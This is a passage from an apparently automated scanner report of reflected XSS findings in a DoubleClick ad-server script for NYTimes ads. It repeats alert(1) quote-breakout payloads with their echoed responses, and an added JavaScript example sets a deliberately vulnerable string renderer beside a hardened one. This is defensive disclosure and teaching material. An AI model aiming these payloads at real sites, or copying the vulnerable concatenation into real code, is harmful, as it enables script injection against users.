This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ece3a"-alert(1)-"92527edee20&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=a ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1264b'-alert(1)-'3e77e92286a was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... &opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=1264b'-alert(1)-'3e77e92286ahttp://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3f4"-alert(1)-"ed84a2146c5 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... &opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=aa3f4"-alert(1)-"ed84a2146c5http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = " ...[SNIP]...
4.30. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N4300.NYTimes/B5008440.7
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52120"-alert(1)-"e9a993e1182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:22:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6713
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&52120"-alert(1)-"e9a993e1182=1http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
4.31. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N4300.NYTimes/B5008440.7
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1eb3b'-alert(1)-'47541a30f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:22:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6713
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&1eb3b'-alert(1)-'47541a30f9f=1http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
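Worked example (added here; it is not code from the report or from the ad server). The JavaScript below models what the findings above describe: a request parameter's value, or, as in 4.30 and 4.31, its name, is concatenated verbatim into a JavaScript string literal that the server emits in its script response, in both the single-quoted and the double-quoted context the evidence shows. A hardened rendering sits beside it. The click-URL template, the parameter set and the canary text are assumptions chosen to resemble the report's evidence. probe() reproduces the scanner's two checks: whether the canary is echoed unmodified, and whether executing the rendered script actually reaches alert(), which is run here with a stub so nothing is displayed.

```javascript
// Added example: models the flaw behind the report's findings. The click
// URL template, parameter names and canary strings are assumptions, not the
// ad server's real code.

const CLICK_BASE = 'http://www.nytimes.com/adx/bin/adx_click.html?type=goto';

// Constructed baseline request, resembling the parameters in the evidence.
function baseParams() {
  return { camp: 'Hyatt_Awaken_1564321-nyt4', ad: 'Hyatt_Awaken-300_PreEmpt' };
}

// Vulnerable rendering: parameter names and values are concatenated raw
// into a quoted JavaScript string. `quote` picks the single- or double-quoted
// context; the report shows the same data landing in both.
function renderVulnerable(params, quote = '"') {
  let url = CLICK_BASE;
  for (const [name, value] of Object.entries(params)) {
    url += '&' + name + '=' + value;
  }
  return 'var url = ' + quote + url + quote + ';';
}

// RFC 3986 percent-encoding. encodeURIComponent leaves ' ( ) ! * untouched,
// and ' is exactly the character that breaks a single-quoted literal, so
// those are encoded as well.
function strictEncode(s) {
  return encodeURIComponent(s).replace(/[!'()*]/g,
    (c) => '%' + c.charCodeAt(0).toString(16).toUpperCase());
}

// Emit a JavaScript string literal. JSON.stringify escapes quotes,
// backslashes and control characters; < and > are escaped too so the
// literal can never close or open a tag if the script is ever inlined.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/</g, '\\u003c').replace(/>/g, '\\u003e');
}

// Hardened rendering: encode for the URL context first, then for the
// JavaScript string context. One layer per context the data passes through.
function renderSafe(params) {
  let url = CLICK_BASE;
  for (const [name, value] of Object.entries(params)) {
    url += '&' + strictEncode(name) + '=' + strictEncode(value);
  }
  return 'var url = ' + jsStringLiteral(url) + ';';
}

// The canary shape used in the report: prefix, quote, -alert(1)-, the same
// quote, suffix. The subtractions keep the statement syntactically valid after
// the break-out, so the injected call runs instead of raising a parse error.
function canary(quote, prefix = 'c0ffee', suffix = 'deadbeef1') {
  return prefix + quote + '-alert(1)-' + quote + suffix;
}

// Reproduce the scanner's checks against one rendering function:
//   echoed   - the canary appears byte-for-byte in the response body
//   executed - running the response reaches alert()
// `where` is 'value' (append to the ad parameter) or 'name' (add a parameter
// whose name is the canary, as in findings 4.30 and 4.31).
function probe(render, quote, where) {
  const payload = canary(quote);
  const params = baseParams();
  if (where === 'name') params[payload] = '1';
  else params.ad += payload;
  const js = render(params, quote);
  const calls = [];
  let parses = true;
  try {
    // Stub alert records its argument instead of showing a dialog.
    new Function('alert', js)((x) => calls.push(x));
  } catch (e) {
    parses = !(e instanceof SyntaxError);
  }
  return { echoed: js.includes(payload), executed: calls.length > 0, parses, js };
}

// Run every combination so the contrast between the two renderers is visible.
function summary() {
  const rows = [];
  for (const [label, render] of [['vulnerable', renderVulnerable], ['safe', renderSafe]]) {
    for (const quote of ['"', "'"]) {
      for (const where of ['value', 'name']) {
        const r = probe(render, quote, where);
        rows.push({ label, quote, where, echoed: r.echoed, executed: r.executed });
      }
    }
  }
  return rows;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(summary());
}
```

Run with node; the table shows echoed and executed true for every vulnerable row and false for every safe row. The point of the two encoding layers is that the same data passes through two grammars (a URL inside a JavaScript literal), and the report's own remediation advice to avoid echoing user data into a script context at all remains the stronger option where the click URL can be built server-side instead.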
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eab1c'-alert(1)-'f3739ac3557 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 91%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryeab1c'-alert(1)-'f3739ac3557&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer- ...[SNIP]...
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fec93"-alert(1)-"12a793669de was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 91%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfec93"-alert(1)-"12a793669de&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer- ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e822"-alert(1)-"4c3ac561287 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle5e822"-alert(1)-"4c3ac561287&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotel ...[SNIP]...
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c4d'-alert(1)-'30c800381f4 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:56 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddlee2c4d'-alert(1)-'30c800381f4&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotel ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0b14"-alert(1)-"7dfe82f805d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacfb0b14"-alert(1)-"7dfe82f805d&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var ...[SNIP]...
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5acee'-alert(1)-'0d1577c5b6e was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf5acee'-alert(1)-'0d1577c5b6e&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3de13'-alert(1)-'20284093fee was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e33de13'-alert(1)-'20284093fee&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a5cf"-alert(1)-"9d93ddc41f was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6697
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e39a5cf"-alert(1)-"9d93ddc41f&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUr ...[SNIP]...
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90833'-alert(1)-'1a292f51b94 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... times.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick90833'-alert(1)-'1a292f51b94&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e889c"-alert(1)-"f675ac94119 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... times.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclicke889c"-alert(1)-"f675ac94119&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ed64"-alert(1)-"a101d628bd6 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=12898020729ed64"-alert(1)-"a101d628bd6&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wm ...[SNIP]...
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c075a'-alert(1)-'2933f51287e was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:21:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072c075a'-alert(1)-'2933f51287e&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2951d"-alert(1)-"f11c4fafd07 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:35 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/11c/%2a/e%3B232517680%3B0-0%3B0%3B56322591%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2951d"-alert(1)-"f11c4fafd07&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe6d8'-alert(1)-'94632e14065 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:20:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6701
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 8/3a53/7/11c/%2a/e%3B232517680%3B0-0%3B0%3B56322591%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotofe6d8'-alert(1)-'94632e14065&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cfd7'-alert(1)-'0203b74b4cd was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
